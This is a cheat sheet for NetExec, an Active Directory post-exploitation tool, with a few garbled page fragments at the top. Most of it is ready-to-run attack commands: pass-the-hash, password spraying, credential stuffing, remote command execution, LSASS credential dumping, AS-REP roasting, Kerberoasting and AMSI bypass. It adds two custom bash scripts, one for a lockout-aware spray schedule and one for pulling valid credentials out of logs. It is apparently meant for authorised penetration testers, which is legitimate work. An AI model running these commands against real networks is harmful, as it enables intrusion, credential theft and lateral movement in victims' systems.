NetExec
"Clase de la hoja"
########################################################################################################################################################################################################################################################## Copiar todos los comandos
■/div titulada
NetExec (formerly CrackMapExec) is a post-exploitation tool that automates the security assessment of large Active Directory networks by abusing network protocols (SMB, LDAP, WinRM, MSSQL, SSH and others) and running credential attacks against them. Every run is logged to a local database, so the same commands double as the engagement's evidence trail.
Installation

| Command | Description |
| --- | --- |
| `pipx install git+https://github.com/Pennyw0rth/NetExec` | Install with pipx straight from GitHub (recommended: isolated environment, upgrade later with `pipx upgrade netexec`) |
| `sudo apt install netexec` | Install the packaged version on Kali Linux |
| `git clone https://github.com/Pennyw0rth/NetExec.git` | Clone the repository |
| `cd NetExec && pip3 install .` | Install from the cloned source |
| `netexec --version` | Check the installed version |
| `netexec --help` | Display help information |

The install also provides the shorter `nxc` binary; every `netexec` command in this sheet works unchanged as `nxc`.
Basic usage

| Command | Description |
| --- | --- |
| `netexec smb 192.168.1.0/24` | Scan SMB across a subnet (a target may be a single IP, a CIDR range, a hostname, or a file of targets) |
| `netexec smb 192.168.1.100 -u username -p password` | Authenticate with domain credentials |
| `netexec smb 192.168.1.100 -u username -p password --local-auth` | Authenticate as a local (non-domain) account |
| `netexec smb 192.168.1.100 -u username -H ntlmhash` | Authenticate with an NTLM hash (pass-the-hash) |
| `netexec smb 192.168.1.100 -u '' -p ''` | Null session (anonymous) |
| `netexec smb targets.txt -u username -p password` | Read targets from a file, one per line |
Protocol support

SMB protocol

| Command | Description |
| --- | --- |
| `netexec smb 192.168.1.100` | Fingerprint the host: OS build, hostname, domain, SMB signing and SMBv1 status |
| `netexec smb 192.168.1.100 -u username -p password --shares` | Enumerate shares and the READ/WRITE access the account has on each |
| `netexec smb 192.168.1.100 -u username -p password --users` | Enumerate domain users |
| `netexec smb 192.168.1.100 -u username -p password --groups` | Enumerate domain groups |
| `netexec smb 192.168.1.100 -u username -p password --local-groups` | Enumerate local groups |
| `netexec smb 192.168.1.100 -u username -p password --sessions` | Enumerate active sessions |
| `netexec smb 192.168.1.100 -u username -p password --disks` | Enumerate disks |
| `netexec smb 192.168.1.100 -u username -p password --loggedon-users` | Enumerate logged-on users |

Only the fingerprint (and, on permissive hosts, `--shares`) works over a null session; the other flags need a valid account.
WinRM protocol

| Command | Description |
| --- | --- |
| `netexec winrm 192.168.1.100 -u username -p password` | WinRM authentication; a `Pwn3d!` tag means the account can execute commands over WinRM |
| `netexec winrm 192.168.1.100 -u username -p password -x "whoami"` | Execute a cmd.exe command |
| `netexec winrm 192.168.1.100 -u username -p password -X "Get-Process"` | Execute a PowerShell command (`-X` takes a command string, not a script path) |
LDAP protocol

| Command | Description |
| --- | --- |
| `netexec ldap 192.168.1.100 -u username -p password` | LDAP bind |
| `netexec ldap 192.168.1.100 -u username -p password --users` | Enumerate domain users together with their description attribute (a frequent place for stray passwords) |
| `netexec ldap 192.168.1.100 -u username -p password --groups` | Enumerate domain groups |
| `netexec ldap 192.168.1.100 -u username -p password --computers` | Enumerate domain computers |
| `netexec ldap 192.168.1.100 -u username -p password --get-sid` | Print the domain SID |
MSSQL protocol

| Command | Description |
| --- | --- |
| `netexec mssql 192.168.1.100 -u username -p password` | MSSQL authentication with a Windows/domain account |
| `netexec mssql 192.168.1.100 -u username -p password -q "SELECT @@version"` | Execute a SQL query |
| `netexec mssql 192.168.1.100 -u sa -p password --local-auth` | Authenticate as a SQL login instead of a Windows account |
| `netexec mssql 192.168.1.100 -u username -p password -x "whoami"` | Execute an OS command through xp_cmdshell (needs sysadmin on the instance) |
SSH protocol

| Command | Description |
| --- | --- |
| `netexec ssh 192.168.1.100 -u username -p password` | SSH password authentication |
| `netexec ssh 192.168.1.100 -u username -p '' --key-file id_rsa` | SSH key authentication (`--key-file` is the flag; `-p` carries the key passphrase, empty here) |
| `netexec ssh 192.168.1.100 -u username -p password -x "id"` | Execute a command |
Authentication methods

Password authentication

| Command | Description |
| --- | --- |
| `netexec smb 192.168.1.100 -u username -p password` | Single credential |
| `netexec smb 192.168.1.100 -u users.txt -p passwords.txt` | Every user against every password (brute force; each failure counts toward that user's lockout threshold) |
| `netexec smb 192.168.1.100 -u users.txt -p passwords.txt --no-bruteforce` | Pairwise: line N of users.txt with line N of passwords.txt (credential stuffing from a dump or leak) |
| `netexec smb 192.168.1.100 -u users.txt -p 'Password123!' --continue-on-success` | Password spraying: one password across many users, continuing after the first hit |
| `netexec smb 192.168.1.100 -u username -p passwords.txt` | Brute force a single account (only sensible when the lockout threshold is 0 or the account is known to be exempt) |
Hash authentication

| Command | Description |
| --- | --- |
| `netexec smb 192.168.1.100 -u username -H ntlmhash` | NTLM hash (pass-the-hash) |
| `netexec smb 192.168.1.100 -u username -H lmhash:ntlmhash` | LM:NTLM pair as dumped from a SAM or NTDS (the LM half is normally the empty-LM value `aad3b435b51404eeaad3b435b51404ee`) |
| `netexec smb 192.168.1.100 -u users.txt -H hashes.txt --no-bruteforce` | Hash lists, matched line by line with the user list |
Kerberos authentication

| Command | Description |
| --- | --- |
| `netexec smb dc01.domain.com -u username -p password -k` | Kerberos authentication (`-k` is short for `--kerberos`); the target must be a hostname the KDC knows, not an IP |
| `KRB5CCNAME=username.ccache netexec smb dc01.domain.com --use-kcache` | Authenticate with the ticket in the ccache named by `KRB5CCNAME` (pass-the-ticket) |
| `netexec smb dc01.domain.com -u username --aesKey <aes256key> -k` | Kerberos with an AES key instead of a password |
| `netexec smb dc01.domain.com -u username -p password -k --kdcHost dc01.domain.com` | Name the KDC explicitly when the attack box cannot resolve the domain |
Enumeration

Share enumeration

| Command | Description |
| --- | --- |
| `netexec smb 192.168.1.100 -u '' -p '' --shares` | Share listing over a null session (works only on permissive hosts) |
| `netexec smb 192.168.1.100 -u username -p password --shares` | Authenticated share listing with READ/WRITE per share |
| `netexec smb 192.168.1.100 -u username -p password --spider SHARE --pattern txt` | Spider a share for paths containing "txt" (`--pattern` is a substring match; `--regex` takes a regular expression) |
| `netexec smb 192.168.1.100 -u username -p password --spider SHARE --pattern pass --content` | Also search inside file contents (much slower, and noisy on large shares) |
User enumeration

| Command | Description |
| --- | --- |
| `netexec smb 192.168.1.100 -u username -p password --users` | Enumerate domain users |
| `netexec smb 192.168.1.100 -u '' -p '' --rid-brute` | RID cycling through SAMR/LSA lookups; often works over a null session when `--users` does not |
| `netexec smb 192.168.1.100 -u '' -p '' --rid-brute 6000` | Raise the highest RID tried (`--rid-brute` takes a maximum RID, default 4000, not a range) |
Group enumeration

| Command | Description |
| --- | --- |
| `netexec smb 192.168.1.100 -u username -p password --groups` | Enumerate domain groups |
| `netexec smb 192.168.1.100 -u username -p password --local-groups` | Enumerate local groups |
| `netexec smb 192.168.1.100 -u username -p password --groups "Domain Admins"` | List the members of one group |
Computer enumeration

| Command | Description |
| --- | --- |
| `netexec ldap 192.168.1.100 -u username -p password --computers` | Enumerate computer accounts over LDAP |
| `netexec smb 192.168.1.100 -u username -p password --computers` | Enumerate computer accounts over SMB |
Command execution

SMB command execution

| Command | Description |
| --- | --- |
| `netexec smb 192.168.1.100 -u username -p password -x "whoami"` | Execute a cmd.exe command (requires local admin on the target) |
| `netexec smb 192.168.1.100 -u username -p password -X "Get-ChildItem C:\Users"` | Execute a PowerShell command (`-X` is a command string, not a script file) |
| `netexec smb 192.168.1.100 -u username -p password -x "whoami" --exec-method wmiexec` | Run through WMI (Win32_Process); tried first when no method is given |
| `netexec smb 192.168.1.100 -u username -p password -x "whoami" --exec-method smbexec` | Run through a temporary service over SMB (noisier: creates a service and writes output to a share) |
| `netexec smb 192.168.1.100 -u username -p password -x "whoami" --exec-method atexec` | Run through a scheduled task |

`--exec-method` alone does nothing; it only selects how `-x`/`-X` are delivered.
WinRM command execution

| Command | Description |
| --- | --- |
| `netexec winrm 192.168.1.100 -u username -p password -x "whoami"` | cmd.exe command |
| `netexec winrm 192.168.1.100 -u username -p password -X "Get-Process"` | PowerShell command |
Modules

Built-in modules

| Command | Description |
| --- | --- |
| `netexec smb -L` | List the modules available for a protocol |
| `netexec smb 192.168.1.100 -u username -p password -M spider_plus` | Enhanced share spidering: writes every readable file path into a JSON report |
| `netexec smb 192.168.1.100 -u username -p password -M enum_av` | Enumerate installed AV/EDR products |
| `netexec smb 192.168.1.100 -u username -p password -M gpp_password` | Recover cPassword values from Group Policy Preferences in SYSVOL |
| `netexec smb 192.168.1.100 -u username -p password -M lsassy` | Dump credentials from LSASS memory remotely |
| `netexec smb 192.168.1.100 -u username -p password -M nanodump` | Dump LSASS with nanodump |
Module options

| Command | Description |
| --- | --- |
| `netexec smb -M spider_plus --options` | Show a module's options and their defaults |
| `netexec smb 192.168.1.100 -u username -p password -M spider_plus -o DOWNLOAD_FLAG=True` | Pass an option as `KEY=VALUE` (here: download the spidered files instead of only listing them) |

Several options can follow a single `-o`, separated by spaces.
Database operations

Every run is written to a SQLite database under `~/.nxc/`, browsed with the separate `nxcdb` tool; `netexec` itself has no `db` subcommand.

| Command | Description |
| --- | --- |
| `nxcdb` | Open the interactive database shell |
| `workspace create engagement1` | Create a workspace (inside nxcdb) |
| `workspace engagement1` | Switch to a workspace |
| `proto smb` | Select the protocol database to browse |
| `hosts` / `creds` / `shares` | List stored hosts, credentials and shares for the selected protocol |
| `export creds detailed creds.csv` | Export stored credentials (run `help` inside nxcdb for the exact export forms your version supports) |
Advanced features

Credential stuffing

| Command | Description |
| --- | --- |
| `netexec smb targets.txt -u users.txt -p passwords.txt --continue-on-success` | Keep testing after a valid credential is found (by default nxc stops at the first hit per target) |
| `netexec smb targets.txt -u users.txt -p passwords.txt --fail-limit 3` | Stop after 3 failed logins in total |
| `netexec smb targets.txt -u users.txt -p passwords.txt --ufail-limit 2` | Stop testing a user after 2 failures (stays under a typical lockout threshold) |
| `netexec smb targets.txt -u users.txt -p passwords.txt --gfail-limit 10` | Global failure limit across all users and targets |
Password policy

| Command | Description |
| --- | --- |
| `netexec smb 192.168.1.100 -u '' -p '' --pass-pol` | Password policy over a null session: lockout threshold, observation window, lockout duration, complexity |
| `netexec smb 192.168.1.100 -u username -p password --pass-pol` | Authenticated password policy query (use this when the null session is refused) |

Read the lockout threshold and observation window before any spray, and plan to stay at least two attempts below the threshold per window.
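The following is an added example, not NetExec code and not part of the original cheat sheet: a small bash wrapper that turns the two `--pass-pol` numbers into a spray schedule. It assumes a targets file, a users file and a passwords file with one candidate per line; the threshold and window arguments are the values `--pass-pol` printed. `DRY_RUN=1` prints the commands instead of running them.

```bash
#!/usr/bin/env bash
# Lockout-aware password spray wrapper around netexec (added example; not part of NetExec).
# Assumed inputs (not from the original page): targets.txt, users.txt, passwords.txt, plus the
# lockout threshold and observation window (minutes) read from `netexec smb <dc> --pass-pol`.

# safe_rounds THRESHOLD
#   Spray rounds allowed inside one observation window, keeping two attempts of headroom
#   because some users may already carry a non-zero badPwdCount. A threshold of 0 means the
#   domain has no lockout policy; 0 is returned to mean "no pause needed".
safe_rounds() {
  threshold=$1
  if [ "$threshold" -le 0 ]; then
    echo 0
    return
  fi
  rounds=$((threshold - 2))
  if [ "$rounds" -lt 1 ]; then
    rounds=1
  fi
  echo "$rounds"
}

# build_cmd TARGETS_FILE USERS_FILE PASSWORD
#   Prints the netexec invocation for one round. One password against every user is spraying;
#   --continue-on-success keeps going after a hit so every valid account is found;
#   --no-progress keeps the output greppable when it is tee'd to a file.
build_cmd() {
  printf "netexec smb %s -u %s -p '%s' --continue-on-success --no-progress\n" "$1" "$2" "$3"
}

# spray TARGETS_FILE USERS_FILE PASSWORDS_FILE THRESHOLD WINDOW_MINUTES
#   One round per password; after safe_rounds rounds, sleep out the observation window
#   (plus one minute of margin) so the per-user failure counters reset before continuing.
spray() {
  targets=$1; users=$2; passwords=$3; threshold=$4; window=$5
  rounds=$(safe_rounds "$threshold")
  n=0
  while IFS= read -r pw || [ -n "$pw" ]; do
    if [ -z "$pw" ]; then
      continue
    fi
    if [ "${DRY_RUN:-0}" = 1 ]; then
      build_cmd "$targets" "$users" "$pw"
    else
      netexec smb "$targets" -u "$users" -p "$pw" --continue-on-success --no-progress
    fi
    n=$((n + 1))
    if [ "$rounds" -gt 0 ] && [ $((n % rounds)) -eq 0 ]; then
      echo "# $n rounds done; waiting $((window + 1)) min for the observation window to reset" >&2
      if [ "${DRY_RUN:-0}" != 1 ]; then
        sleep $(( (window + 1) * 60 ))
      fi
    fi
  done < "$passwords"
}

# Usage: DRY_RUN=1 ./spray.sh targets.txt users.txt passwords.txt 5 30
if [ "$#" -eq 5 ]; then
  spray "$@"
fi
```

Run it once with `DRY_RUN=1` to review the schedule, then without. Passwords containing a single quote will print oddly in dry-run mode but are passed to netexec correctly, because the live path hands them over as arguments rather than through a shell string.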
BloodHound integration

| Command | Description |
| --- | --- |
| `netexec ldap 192.168.1.100 -u username -p password --bloodhound --collection All` | Collect BloodHound data (`-c` is the short form of `--collection`); the zip lands in `~/.nxc/logs/` |
| `netexec ldap 192.168.1.100 -u username -p password --bloodhound --collection All --dns-server 192.168.1.100` | Point the collector at the domain's DNS server when the attack box does not use it |
ASREPRoast

| Command | Description |
| --- | --- |
| `netexec ldap 192.168.1.100 -u users.txt -p '' --asreproast asrep.txt` | Unauthenticated: request AS-REPs for every listed user that has pre-authentication disabled (`-p ''` is required so nxc has a value to try) |
| `netexec ldap 192.168.1.100 -u username -p password --asreproast asrep.txt` | Authenticated: LDAP first finds the accounts with DONT_REQ_PREAUTH set, then requests their AS-REPs |

The output is in hashcat format (mode 18200).
Kerberoasting

| Command | Description |
| --- | --- |
| `netexec ldap 192.168.1.100 -u username -p password --kerberoasting kerb.txt` | Request TGS tickets for every account with an SPN and write them in hashcat format (mode 13100) |
Output and logging

| Command | Description |
| --- | --- |
| `netexec smb 192.168.1.100 --verbose` | Verbose output |
| `netexec smb 192.168.1.100 --debug` | Debug output (full protocol errors and stack traces) |
| `netexec smb 192.168.1.100 --log run.log` | Also write the run output to a log file (`--log` takes a file path, not a directory) |
| `netexec smb 192.168.1.100 --no-progress` | Disable the progress bar (cleaner output when piping through `tee`) |

`-o` is not an output flag: it passes options to a module (see Module options). Loot such as secretsdump output and BloodHound zips is written under `~/.nxc/logs/` regardless of `--log`.
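Added example, again not NetExec's own code: triage functions for output captured with `netexec ... | tee run.log` or `--log run.log`. The sample log below is constructed to mirror nxc's column layout (protocol, host, port, name, `[tag]`, message); every host, account and secret in it is invented. It pulls valid credentials into CSV, flags hosts where the account was admin (nxc tags those `Pwn3d!`), and lists accounts that came back `STATUS_ACCOUNT_LOCKED_OUT`, which is the signal to stop a spray.

```bash
#!/usr/bin/env bash
# Triage helpers for netexec output (added example; this is not NetExec code).
# SAMPLE_LOG is constructed for the demo: hosts, domain, users and secrets are made up.

SAMPLE_LOG='SMB         192.168.1.100   445    DC01             [*] Windows Server 2019 Build 17763 x64 (name:DC01) (domain:corp.local) (signing:True) (SMBv1:False)
SMB         192.168.1.100   445    DC01             [+] corp.local\jdoe:Winter2024!
SMB         192.168.1.101   445    WS01             [+] corp.local\jdoe:Winter2024! (Pwn3d!)
SMB         192.168.1.100   445    DC01             [-] corp.local\asmith:Winter2024! STATUS_LOGON_FAILURE
SMB         192.168.1.100   445    DC01             [-] corp.local\bjones:Winter2024! STATUS_ACCOUNT_LOCKED_OUT
SMB         192.168.1.102   445    SRV01            [+] corp.local\svc_backup:aad3b435b51404eeaad3b435b51404ee:5fbc3d5fec8206a30f4b6c473d68ae76 (Pwn3d!)'

# strip_ansi: drop colour codes so the filters work on tee'd terminal output as well as --log files
strip_ansi() {
  esc=$(printf '\033')
  sed "s/${esc}\[[0-9;]*m//g"
}

# valid_creds < log
#   One CSV row per [+] line: host,account,secret,admin. The host is the field after the protocol
#   column, so an extra leading prefix such as a timestamp does not break it. The secret runs to
#   the next space, so a password containing spaces is truncated; check the raw line in that case.
valid_creds() {
  strip_ansi | awk '
    /\[[+]\] / {
      host = "?"
      for (i = 1; i < NF; i++)
        if ($i ~ /^(SMB|LDAP|WINRM|MSSQL|SSH|RDP|WMI|FTP|NFS|VNC)$/) { host = $(i + 1); break }
      match($0, /\[[+]\] [^ ]+/)
      tok = substr($0, RSTART + 4, RLENGTH - 4)        # domain\user:secret
      sep = index(tok, ":")
      if (sep == 0) next                               # a [+] line that carries no credential
      admin = ($0 ~ /\(Pwn3d!\)/) ? "yes" : "no"
      printf "%s,%s,%s,%s\n", host, substr(tok, 1, sep - 1), substr(tok, sep + 1), admin
    }'
}

# locked_out < log -> accounts that returned STATUS_ACCOUNT_LOCKED_OUT; any output means stop spraying
locked_out() {
  strip_ansi | awk '
    /\[-\] .*STATUS_ACCOUNT_LOCKED_OUT/ {
      match($0, /\[-\] [^ ]+/)
      tok = substr($0, RSTART + 4, RLENGTH - 4)
      sep = index(tok, ":")
      print (sep ? substr(tok, 1, sep - 1) : tok)
    }' | sort -u
}

# admin_hosts < log -> hosts where the credential was local admin
admin_hosts() {
  valid_creds | awk -F, '$4 == "yes" { print $1 }' | sort -u
}

# Demo on the constructed sample: ./triage.sh --demo   (real use: valid_creds < run.log)
if [ "${1:-}" = "--demo" ]; then
  printf '%s\n' "$SAMPLE_LOG" | valid_creds
  echo "locked out:"
  printf '%s\n' "$SAMPLE_LOG" | locked_out
fi
```

Because the functions read stdin, they chain directly onto a live run: `netexec smb targets.txt -u users.txt -p 'Winter2024!' --continue-on-success --no-progress | tee run.log | locked_out` shows lockouts as they happen.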
Configuration

Config file (`~/.nxc/nxc.conf`)

```ini
[nxc]
workspace = default
last_used_db = smb
pwn3d_label = Pwn3d!
audit_mode =
reveal_chars_of_pwd = 0
log_mode = False
ignore_opsec = True

[BloodHound]
bh_enabled = False
bh_uri = 127.0.0.1
bh_port = 7687
bh_user = neo4j
bh_pass = neo4j
```

`last_used_db` holds the protocol nxcdb opens by default, not a file path. Setting `audit_mode` to a character (for example `*`) masks passwords in the output, with `reveal_chars_of_pwd` controlling how many leading characters stay visible; this is what you want in screenshots for a report. With `bh_enabled = True` every host where a credential is tagged `Pwn3d!` is marked owned in the configured BloodHound Neo4j database.
Protocol-specific options

| Command | Description |
| --- | --- |
| `netexec smb 192.168.1.100 --port 445` | Custom port |
| `netexec smb 192.168.1.100 --timeout 5` | Connection timeout in seconds |
| `netexec smb 192.168.1.100 --threads 100` | Thread count (`-t`); lower it on fragile or heavily monitored targets |
Evasion options

| Command | Description |
| --- | --- |
| `netexec smb 192.168.1.100 -u users.txt -p 'Password123!' --jitter 1-5` | Random delay between authentication attempts |
| `netexec smb 192.168.1.100 -u users.txt -p 'Password123!' --threads 1` | Serialise connections so each host sees one login attempt at a time |
| `netexec smb 192.168.1.100 -u username -p password -X "whoami" --obfs` | Obfuscate the PowerShell launcher used by `-X` |
| `netexec smb 192.168.1.100 -u username -p password -X "whoami" --amsi-bypass bypass.ps1` | Prepend your own AMSI bypass (here a placeholder file name) to the PowerShell payload |

None of these hide the authentication events themselves: every attempt still produces 4624/4625/4776 events on the target and the DC.
Common attack scenarios

Domain enumeration

```bash
# Basic domain enumeration
netexec smb dc.domain.com -u username -p password --users --groups --computers
# Share enumeration across the subnet
netexec smb 192.168.1.0/24 -u username -p password --shares
# Password policy (read this before spraying)
netexec smb dc.domain.com -u username -p password --pass-pol
```

Credential attacks

```bash
# Password spraying: one password, many users, keep going after hits
netexec smb 192.168.1.0/24 -u users.txt -p 'Password123!' --continue-on-success
# Hash spraying with a local administrator hash (--local-auth, or nxc treats the account as a domain user)
netexec smb 192.168.1.0/24 -u administrator -H aad3b435b51404eeaad3b435b51404ee:5fbc3d5fec8206a30f4b6c473d68ae76 --local-auth
# ASREPRoast without credentials (-p '' is required)
netexec ldap dc.domain.com -u users.txt -p '' --asreproast asrep_hashes.txt
```

Post-exploitation

```bash
# Command execution
netexec smb 192.168.1.100 -u username -p password -x "net user /domain"
# LSASS dumping
netexec smb 192.168.1.100 -u username -p password -M lsassy
# BloodHound collection
netexec ldap dc.domain.com -u username -p password --bloodhound --collection All
```
Integration with other tools

Impacket integration

| Command | Description |
| --- | --- |
| `netexec smb 192.168.1.100 -u username -p password -x "whoami" --exec-method wmiexec` | Execution through Impacket's wmiexec technique |
| `netexec smb 192.168.1.100 -u username -p password -x "whoami" --exec-method smbexec` | Execution through Impacket's smbexec technique |

CrackMapExec migration

| Command | Description |
| --- | --- |
| `ls ~/.nxc/` | NetExec keeps its config, database and logs here (CrackMapExec used `~/.cme/`); the two trees are separate |
| `alias cme='nxc'` | Shell alias so old muscle memory keeps working; the flags are the same |
Troubleshooting

| Command | Description |
| --- | --- |
| `netexec --help` | General help |
| `netexec smb --help` | Protocol-specific help (the authoritative list of flags for your installed version) |
| `netexec --version` | Version information |
| `netexec --debug smb 192.168.1.100` | Debug mode; global flags go before the protocol name |
Best practices

- Authenticate before enumerating whenever you have credentials; null sessions are both noisier and less complete.
- Use `--jitter` and a low thread count to limit lockouts and noise.
- Use workspaces to keep different engagements apart in the database.
- Export results for further analysis and reporting.
- Combine with other tools for a complete assessment.
- Watch for defensive responses (lockouts, blocked source IPs, EDR alerts) and stop when you see them.
- Keep thread counts appropriate to the target so you do not overwhelm hosts.
- Keep logs for documentation (`--log` plus the database).
- Validate credentials against a single host before any large-scale attack.
- Use obfuscation options when the engagement calls for them.
Security considerations

- Use only on networks you are authorised to test.
- Implement appropriate access controls on the machine holding the nxc database, which stores plaintext credentials and hashes.
- Monitor for detection by security tools.
- Apply least-privilege principles to the accounts you use.
- Document all activities for compliance.
- Coordinate with the blue team where applicable.
- Implement appropriate cleanup procedures (services, scheduled tasks and dropped files left by execution methods).
- Store harvested credentials securely.
- Use encrypted communication where possible (SMB signing, LDAPS, WinRM over HTTPS).
- Update regularly to stay effective.